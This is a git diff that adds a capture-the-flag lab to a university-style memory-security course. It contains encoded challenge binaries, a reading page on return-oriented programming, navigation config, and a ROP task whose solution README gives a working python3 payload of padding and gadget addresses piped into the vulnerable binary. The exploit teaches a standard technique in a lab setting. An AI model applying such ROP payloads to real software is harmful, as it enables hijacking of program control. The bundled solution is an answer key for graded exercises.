zd_^5*@7jT_5Q+7B7Rhe~=9dJh;yhO?DuJ!}Sc&-<Sfrl;w%Viq0bmAx>`w*op+)+C
zQiQ$Gc^tUaY_9^*!ruWGe`}j8(r5o)T!hao!gz?{B;rLLrZ_$iFz2h$pOs>*u|z;h
zxe!ky@0=U&O3@1WB>YJ=`g0Wa518|f_Ie@U`)Jtnh^a;G-w64<|5geO*ou5vpN9%7
z@Fh+b>2v%%QSv;G=FvaIb-}cr(XkODRKao_9zxs^PHXzG7Q|+aa8%PmNo^>e91O&@
z5Ejjh7RZi>U~)JW59{HOZ%a!XSNJbc!p@$EX@PV)Fsg+UdU{kuaKjzeLfPTrQB)~H
z8Z`9<s*DY+5K7a!Z|JzzulaX%Y1l^>Dq}nEx@A|#wLP5+B{J>+3tNWf-)UOd*>!`^
zcJyAiy`xvVuDkn2f4|n>u^o{B6y;aZU?wZO4UBNm$3P+#)bwaJvDY^^Vt!U_Z=e5S
zIu~llPp!ogEgTBy0rRWt0)a+>@sZVtf%pM;p~iyGu<&jssYUUrH*UmW3>S;P02kLa
zKK2%KzVN~KON1OZp8+@JSfW_L{H|Qg(n4`99p)Db1WoX>9t&!z7`hfoY0>>~-C!nT
z4o`04^B*=K>%X?se2~JI868IC0;;DC8nsFYYr^T2@FlQS`#QGwH0X$U41~zsH<*p#
zZwq1};UkI$GEw0RjV55vpa^!PWM4R)i6s*YfCd?QPkp11itEBB2k%4CH<Sd_87cWV
zfuWO>57HNono~9!f(Z*5RgJl8)Ue8EATS&YqVc3o%jg;>gb&^kKD<D~cqzaO4`zo@
zC6E}x+h)R8B9gSqfx*Fac%Oy%dB`d=ru%&pcS<fLc>RsPNddsgYA#vJ%sOxwl~7Oq
z?Fa;3l&!>diK!Xc(qlYy1bTH+V*FToU4S3rZjSaCC!H|$jK~P*R`8kmHxpQmWV?)?
zW}r6%%!mm^sl({xCS*okw8#6!<0x=XwGwriZb#<bAoUn;twJUK-G<dJ`OJHfd6&pC
z<FHofc~LHI7f{@Z%xH{yypQaM9{Xe2;~2Q8=8&nk9hq@k2zonFrXG&(avaoq5Se{t
zJ6w-XKyMw&R-!$o!^oB%<GdN@9jCxd>;rYbjcn;L{!4)=7kN{UW#&IG(&N5!0D9ks
zO)JqJ(__e%J?_udsBA=cQY_nK>90&Z`i1*eJ@gJyU?yuEe+x`|)MNa?zdh<Tbx16|
zpQCK)G47m&UK<%^vh+>^Gd5$_8Q<`4kt`WiS!RA2nNcqF7$<pthaTf1J`3tGe&XL&
z<xL)lw1uvShmqMG>M^dJ{T=pL*V2>m6&%|Ho|UZry$^<^$2g}6dW=D>WQ~dUXKbJC
zGTzt<Jz^_)&B81w?OAP6?_yI%LK$-jen_nphMv~~pq8w9k=`NbRa>1Z((^9T`!h_I
zZp%oK9^=I#ws;-)u;oPzt9ZGoXN}{(aCC5T@MfZ(l{u%ZG|M9cUbeL$T%*`kbXmTW
dMb*VDjskZTRirJZ3glwF{V?RWgpgUq{{>}OI#>Vz

literal 0
HcmV?d00001

diff --git a/chapters/memory-security/ctf/drills/tasks/rop/README.md b/chapters/memory-security/ctf/drills/tasks/rop/README.md
new file mode 100644
index 00000000..cf34ab4a
--- /dev/null
+++ b/chapters/memory-security/ctf/drills/tasks/rop/README.md
@@ -0,0 +1,11 @@
+# ROP
+
+`rop` is a 64-bit binary with a simple buffer overflow.
+However, it has NX enabled, so normal shellcode will not work.
+Find a way to create a working exploit.
+
+> **TIP:** On x86_64, function arguments are no longer found on the stack but in registers.
+
+If you're having trouble with this exercise, you may use [this](https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/rop-chaining-return-oriented-programming).
+Keep in mind that `peda`'s functionality may be a bit different from that of the provided setup, but you should have [this](https://github.com/JonathanSalwan/ROPgadget).
+In `pwndbg`, you can use something like `rop --grep "pop rsi"`.
diff --git a/chapters/memory-security/ctf/drills/tasks/rop/solution/README.md b/chapters/memory-security/ctf/drills/tasks/rop/solution/README.md
new file mode 100644
index 00000000..f0255a03
--- /dev/null
+++ b/chapters/memory-security/ctf/drills/tasks/rop/solution/README.md
@@ -0,0 +1,14 @@
+# Solution
+
+Idea: The function that needs to be called is `special_function()` with arguments 6 and 9.
+The binary is a 64-bits ELF, therefore the parameters are no longer taken from the stack - they are taken from registers esi and edi;
+in order to set these registers, you need to execute 2 gadgets.
+By using commands like `ropsearch "pop rsi"` and `ropsearch "pop rdi"` in `GDB peda`, you will find gadgets `pop rsi; pop r15; ret` and `pop rdi; ret`.
+We first need to overwrite the return address with the address of the first gadget, followed by 2 8-bytes values (rsi and r15, which is not relevant);
+the value of rsi needs to be the value of the second argument;
+these values are followed by the address of the second gadget and the value of rdi - the first argument of the function.
+Finally, we jump to the address of `special_function()`.
+
+The command below might need to be modified.
+
+`python3 -c 'import sys; sys.stdout.buffer.write(b"A"*24 + b"\x61\x08\x40\x00\x00\x00\x00\x00" + b"\x09\x00\x00\x00\x00\x00\x00\x00" + b"\x00\x00\x00\x00\x00\x00\x00\x00" + b"\x63\x08\x40\x00\x00\x00\x00\x00" + b"\x06\x00\x00\x00\x00\x00\x00\x00" + b"\x98\x07\x40\x00\x00\x00\x00\x00")' | ./rop`
diff --git a/chapters/memory-security/ctf/drills/tasks/rop/support/rop b/chapters/memory-security/ctf/drills/tasks/rop/support/rop
new file mode 100644
index 0000000000000000000000000000000000000000..1be346bc480ebed213902d4e0cee062a67fbb9ea
GIT binary patch
literal 11632
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

literal 0
HcmV?d00001

diff --git a/chapters/memory-security/ctf/reading/README.md b/chapters/memory-security/ctf/reading/README.md
new file mode 100644
index 00000000..b4803f9c
--- /dev/null
+++ b/chapters/memory-security/ctf/reading/README.md
@@ -0,0 +1,13 @@
+# CTF
+
+In this laboratory, you will have to apply most of the concepts presented throughout this course under the format of `Capture-The-Flag` tasks.
+These tasks will test your understanding and mastery of specific static and dynamic analysis methods and tools, the compilation process, assembly language - syntax, registers, memory handling, functions, - as well as your ability to identify and exploit simple buffer overflow vulnerabilities.
+
+## Return Oriented Programming
+
+For the bonus exercise, you will have to use Return Oriented Programming (ROP).
+This is a technique in which, if we have the ability to overwrite the return address, we execute `gadgets`.
+These `gadgets` are simply portions of the existing code that end with a `ret` instruction.
+
+To determine the address of a gadget in a binary, there is the tool [ROPgadget](https://github.com/JonathanSalwan/ROPgadget).
+Alternatively, in `pwndbg`, you can use a command like `rop --grep "pop rsi"`.
diff --git a/config.yaml b/config.yaml
index 9300ecec..0cbf2704 100644
--- a/config.yaml
+++ b/config.yaml
@@ -261,6 +261,25 @@ docusaurus:
                               - Overflow in C/: overflow-in-c/
                               - Overwrite Return Address/: overwrite-ret-addr/
                               - Overflow for Binary File/: overflow-for-binary/
+      - Lab 12 - Capture The Flag:
+          - CTF:
+              path: chapters/memory-security/ctf/
+              subsections:
+                - Reading/: reading/
+                - Drills:
+                    path: drills/
+                    subsections:
+                      - Tasks:
+                          path: tasks/
+                          subsections:
+                            - Hidden in Plain Sight/: hidden-in-plain-sight-1/
+                            - Hidden in Plain Sight ++/: hidden-in-plain-sight-2/
+                            - Look at Him Go/: look-at-him-go/
+                            - Playing God/: playing-god/
+                            - Indirect Business/: indirect-business/
+                            - RIP My Buffers Off/: rip-my-buffers-off/
+                            - Feeling Chained/: feeling-chained/
+                            - Bonus - ROP/: rop/
     # static_assets:
     #   - template-chapter-template-topic: /build/make_assets/chapters/template-chapter/template-topic/slides/_site
     config_meta: